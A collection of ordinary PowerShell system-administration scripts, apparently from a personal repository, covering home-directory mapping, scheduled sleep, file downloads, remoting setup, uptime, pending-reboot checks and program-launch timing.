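Function LagSnarveiSkrivebord() {
    $wshshell = New-Object -ComObject WScript.Shell
    $lnk = $wshshell.CreateShortcut($DesktopPath+"\Hjemmekatalog $brukernavn.lnk")
    $lnk.TargetPath = "$StiHjemmeKatalog\$brukernavn"
    $lnk.Save()
}

# Opens the home directory for the user
Function OpenFolder() {
    Invoke-Item -Path "$StiHjemmeKatalog\$brukernavn"
}

Clear-Host

# Checks whether the home directory is already connected
if ($SMB_folders) {
    Write-Host "`nDet ser ut til at hjemmekatalogen allerede er tilkoblet!" -Fore Green
    Write-Host "`nÅpner mappa for deg... Farvell ツ" -Fore Yellow
    LagSnarveiSkrivebord | Out-Null
    OpenFolder

} else {
    # If the home directory is not connected, try to add it

    Write-Host "`nPrøver å legge til hjemmekatalogen..." -Fore Yellow
    Write-Host "`nVennligst skriv inn passordet til kontoen for å koble til:" -Fore Yellow

    # $? only reflects the last statement, and after a failed New-PSDrive that
    # is the Write-Host inside the Catch, so success is tracked explicitly.
    # -ErrorAction Stop turns a non-terminating connection error into one the
    # Catch actually sees.
    $connected = $false
    Try {
        New-PSDrive -Name x `
            -PSProvider "FileSystem" `
            -Root "$StiHjemmeKatalog\$brukernavn" `
            -Description "Hjemmekatalog Corporation" `
            -Credential (Get-Credential "win-domain-com\$brukernavn") `
            -ErrorAction Stop
        $connected = $true

    } Catch {
        $ErrorMessage = $_.Exception.Message # Grabs the error message if one occurs
        Write-Host "`n$ErrorMessage" -Fore Red # Shows the error message to the user
    }

    if ($connected) {
        Write-Host "`nSuksess! Hjemmekatalogen '$StiHjemmeKatalog\$brukernavn' er tilkoblet!" -Fore Green
        LagSnarveiSkrivebord | Out-Null
        if ($?) {
            Write-Host "`nDet ble opprettet en snarvei på skrivebordet! Farvell ツ " -Fore Green
            OpenFolder
        }
    } Else {
        # -Quiet makes Test-Connection return $true/$false instead of relying on $?
        if (-not (Test-Connection -ComputerName "home.corp.com" -Count 2 -Quiet)) {
            Write-Host "`nMaskinen din når ikke frem til serveren." -Fore Red
            Write-Host "`nSjekk om du har Internett, eventuelt prøv med VPN." -Fore Yellow
        }
        Write-Host "`nGreide ikke å koble til hjemmekatalogen! Scriptet avsluttes.. Farvell ツ" -Fore Red

    }
}

# Waits a few seconds before the script exits
Start-Sleep -Seconds 4
--------------------------------------------------------------------------------
/SysAdmin/Cool-Down-and-Sleep.ps1:
--------------------------------------------------------------------------------
#I used this after gaming, to cool down the computer and make it auto sleep.
#That way I didn't need to sit by the computer and wait for the GPU to cool down and then hit sleep.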
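# Puts the computer into suspend (sleep) through the WinForms power API; the
# two $false arguments mean "do not force" and "do not disable wake events".
function Wait-Computer
{
    Add-Type -Assembly System.Windows.Forms
    $state = [System.Windows.Forms.PowerState]::Suspend
    [System.Windows.Forms.Application]::SetSuspendState($state, $false, $false) | Out-Null
}
# (an empty second `function Wait-Computer {}` used to follow here; being the
# later definition it replaced the real one, so the script never actually slept)

Start-Sleep -Seconds 180 #Equals 3 minutes

Wait-Computer
--------------------------------------------------------------------------------
/SysAdmin/Download-File.ps1:
--------------------------------------------------------------------------------
<#
Various ways to download files with powershell
#>

#source: https://github.com/warferik/WindowsTLS12/blob/master/WinRM-Mem.ps1
# Downloads $url to the local file $path with System.Net.WebClient.
# Arguments: $url  - the URL to fetch
#            $path - destination file path (overwritten if it exists)
# Neither is validated; DownloadFile throws a WebException on failure and the
# caller sees it. The content is not verified (no hash or signature check), so
# only fetch from https URLs you trust.
# NOTE(review): on older .NET Framework builds WebClient may negotiate a TLS
# version below 1.2 by default; set [Net.ServicePointManager]::SecurityProtocol
# before calling if that matters — not done here.
Function Download-File($url, $path) {
    Write-Verbose -Message "downloading url '$url' to '$path'"
    $client = New-Object -TypeName System.Net.WebClient
    $client.DownloadFile($url, $path)
}

#source: https://www.thewindowsclub.com/download-file-using-windows-powershell
#$client = new-object System.Net.WebClient
#$client.DownloadFile("Download Link","File Destination\file name.file extension")
$client = new-object System.Net.WebClient
$client.DownloadFile("http://thewindowsclub.thewindowsclub.netdna-cdn.com/wp-content/upload/2016/Windows-Explorer-Process-Task-Manager-600x405.png","C:\Users\Digdarshan\Pictures\TWC\Task-Manager.png")

# requiring credentials — they may be sent to the host the URL names, so pair
# this only with https URLs of the server the credentials belong to.
$client = new-object System.Net.WebClient
$client.Credentials = Get-Credential
$client.DownloadFile("http://thewindowsclub.thewindowsclub.netdna-cdn.com/wp-content/upload/2016/Windows-Explorer-Process-Task-Manager-600x405.png","C:\Users\Digdarshan\Pictures\TWC\Task-Manager.png")

# -Uri is the address and -OutFile the local file name (the two were swapped before)
Invoke-WebRequest -Uri https://urltofile.com/file.zip -OutFile filenameyouwant.zip

$source = "http://thewindowsclub.thewindowsclubco.netdna-cdn.com/wp-content/uploads/2016/06/Copy-Download-Link.png"
# The destination path had presumably lost its backslashes in a copy-paste.
$destination = "C:\Users\LDORONY\Desktop\1.png"
$client = new-object System.Net.WebClient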
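$client.DownloadFile($source, $destination)
--------------------------------------------------------------------------------
/SysAdmin/README.md:
--------------------------------------------------------------------------------
# SysAdmin

- [Carbon](http://get-carbon.org/) - "Carbon is a PowerShell module for automating the configuration of computers running Windows 7, 8, 2008, and 2012."
- [Posh-SSH](https://github.com/darkoperator/Posh-SSH) - PowerShell Module for automating tasks on remote systems using SSH
- [HTTP Server](https://github.com/zh54321/PowerShell_HttpServer) - Simple PowerShell HTTP Server (no dependencies, single file, PowerShell 5.1/7)

## PowerShell Remoting Setup
````powershell
Enable-PSRemoting -Force #Enabling PSRemoting
set-item wsman:\localhost\Client\TrustedHosts -value * #Trusts every host for client connections, i.e. no host authentication — lab use only, not for a work environment
get-item wsman:\localhost\Client\TrustedHosts #Shows the current TrustedHosts
Set-NetConnectionProfile -NetworkCategory Private #Change of network profile
````

## What process is using this port
````powershell
#Choosing port 8080 as an example
Get-Process -Id (Get-NetTCPConnection -LocalPort 8080).OwningProcess

#Choosing process with ID 7324 as an example below
Get-Process -Id 7324 | Select-Object -ExpandProperty Modules | Select-Object -ExpandProperty FileName | Get-Unique
````
--------------------------------------------------------------------------------
/SysAdmin/Run-Process.ps1:
--------------------------------------------------------------------------------
#source https://github.com/warferik/WindowsTLS12/blob/master/WinRM-Mem.ps1


# Starts $executable with the argument string $arguments, waits for it to end
# and returns its exit code.
# Arguments: $executable - program to run (path or name resolvable by the OS)
#            $arguments  - one string of command-line arguments, passed as-is
# Returns:   the process exit code. Start() throws (e.g. Win32Exception) when
#            the program cannot be started; that error reaches the caller.
# The argument string is handed to the process unquoted and unvalidated, so do
# not build it from untrusted input.
Function Run-Process($executable, $arguments) {
    $process = New-Object -TypeName System.Diagnostics.Process
    $psi = $process.StartInfo
    $psi.FileName = $executable
    $psi.Arguments = $arguments
    Write-Verbose -Message "starting new process '$executable $arguments'"
    $process.Start() | Out-Null

    $process.WaitForExit() | Out-Null
    $exit_code = $process.ExitCode
    Write-Verbose -Message "process completed with exit code '$exit_code'"

    return $exit_code
}

--------------------------------------------------------------------------------
/SysAdmin/Uptime.ps1:
--------------------------------------------------------------------------------
# Prints how long the machine has been up (days, hours, minutes), computed from
# the WMI LastBootUpTime of Win32_OperatingSystem.
function Uptime {
    $OS = Get-WmiObject win32_operatingsystem
    $Uptime = (Get-Date) - ($OS.ConvertToDateTime($OS.lastbootuptime))
    $Uptime = "" + $Uptime.Days + " days, " + $Uptime.Hours + " hours, " + $Uptime.Minutes + " minutes"
    Write-Host "`n Uptime: " -NoNewline -Fore Cyan; Write-Host $Uptime
}

Uptime
--------------------------------------------------------------------------------
/Test-PendingReboot.ps1:
--------------------------------------------------------------------------------
# Returns $true when Windows reports a pending reboot, otherwise $false.
# Sources checked, in order: the CBS RebootPending key, the Windows Update
# RebootRequired key, pending file renames in Session Manager, and finally the
# ConfigMgr (SCCM) client's own check, skipped silently when that client is absent.
function Test-PendingReboot {
    #Adapted from https://gist.github.com/altrive/5329377
    #Based on http://gallery.technet.microsoft.com/scriptcenter/Get-PendingReboot-Query-bdb79542
    # Source: https://ilovepowershell.com/2015/09/10/how-to-check-if-a-server-needs-a-reboot/

    # -EA Ignore: a missing key/value is the normal "nothing pending" case, not an error.
    if (Get-ChildItem "HKLM:\Software\Microsoft\Windows\CurrentVersion\Component Based Servicing\RebootPending" -EA Ignore) { return $true }
    if (Get-Item "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\RebootRequired" -EA Ignore) { return $true }
    if (Get-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager" -Name PendingFileRenameOperations -EA Ignore) { return $true }

    try {
        # The ccm\clientsdk namespace only exists where the ConfigMgr client is
        # installed; the [wmiclass] lookup throws otherwise, hence the empty catch.
        $util = [wmiclass]"\\.\root\ccm\clientsdk:CCM_ClientUtilities"
        $status = $util.DetermineIfRebootPending()
        if(($status -ne $null) -and $status.RebootPending){
            return $true
        }
    }catch{}
    return $false
}
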
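--------------------------------------------------------------------------------
/TimeTrack-Specific-Software-Openings.ps1:
--------------------------------------------------------------------------------
<# Primitive script used to test how long a specific program needs to open.
VLC and Windows Media Player are used as examples, but any program may be used.
Modern servers will have a close average time, while old and unstable servers will vary more.

How it works: the program is launched $AntallKjoringer times. Each launch is timed with
Measure-Command (how long the launch command takes to return), printed colour-coded against
the thresholds below, and the program is killed again before the next run. At the end the
average launch time over all runs is printed.
#>

# Testing VLC or Windows Media Player? The process name (without .exe) is used both to build
# the launch command and to find/kill the process afterwards, so it only needs changing here.
[string] $ProgramNavn = "vlc"
#[string] $ProgramNavn = "wmplayer"

# Windows 7 paths:
Set-Location 'C:\Program Files\VideoLAN\VLC\'
#Set-Location 'C:\Program Files\Windows Media Player\'

#Windows 10 paths:
#Set-Location 'C:\Program Files (x86)\VideoLAN\VLC\'
#Set-Location 'C:\Program Files\Windows Media Player\'

# Number of timed launches (the original loop ran teller 1..1000).
[int] $AntallKjoringer = 1000

# Thresholds in milliseconds: <= $GrontGrense is green, up to $RodtGrense-1 is yellow,
# >= $RodtGrense is red.
[int] $GrontGrense = 22
[int] $RodtGrense = 28

# Relative launch command, resolved against the Set-Location above; fail early if it is
# missing rather than producing 1000 identical errors.
$Exe = ".\$ProgramNavn.exe"
if (-not (Test-Path -LiteralPath $Exe)) {
    throw "Cannot find $Exe in $(Get-Location)"
}

[int] $teller = 1
[int] $SammenLagtTid = 0

Write-Host ""

while ($teller -le $AntallKjoringer) {

    # TotalMilliseconds is the whole elapsed time. The previously used .Milliseconds is only
    # the 0-999 ms component of the TimeSpan and silently drops whole seconds.
    [int] $tid = (Measure-Command { & $Exe }).TotalMilliseconds

    If ($tid -le $GrontGrense) {
        Write-Host "Kjøring nr. $teller viser $tid" -Fore Green
    } ElseIf ($tid -lt $RodtGrense) {
        Write-Host " Kjøring nr. $teller viser $tid <-" -Fore Yellow
    } Else {
        Write-Host " Kjøring nr. $teller viser $tid <-" -Fore Red
    }

    # Sum all launch times for the average at the end.
    $SammenLagtTid = $SammenLagtTid + $tid

    $teller++

    # Kill the program again so the next run measures a fresh start.
    # -ErrorAction SilentlyContinue: Get-Process -Name writes an error when no such process
    # exists; that case is reported by the $null check below instead.
    $FinnesProgram = Get-Process -Name $ProgramNavn -ErrorAction SilentlyContinue
    If ($FinnesProgram -eq $null) {
        Write-Host "`nProgrammet kjører ikke" -Fore Yellow
    } Else {
        Get-Process |
            Where-Object {$_.ProcessName -match $ProgramNavn} |
            Stop-Process -Force
    }
}

# Divide by the number of runs, not by $teller: after the loop $teller is one past the last
# run, which skewed the old average downwards.
Write-Host "`nGjennomsnittet er $($SammenLagtTid/$AntallKjoringer) millisekunder"
--------------------------------------------------------------------------------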
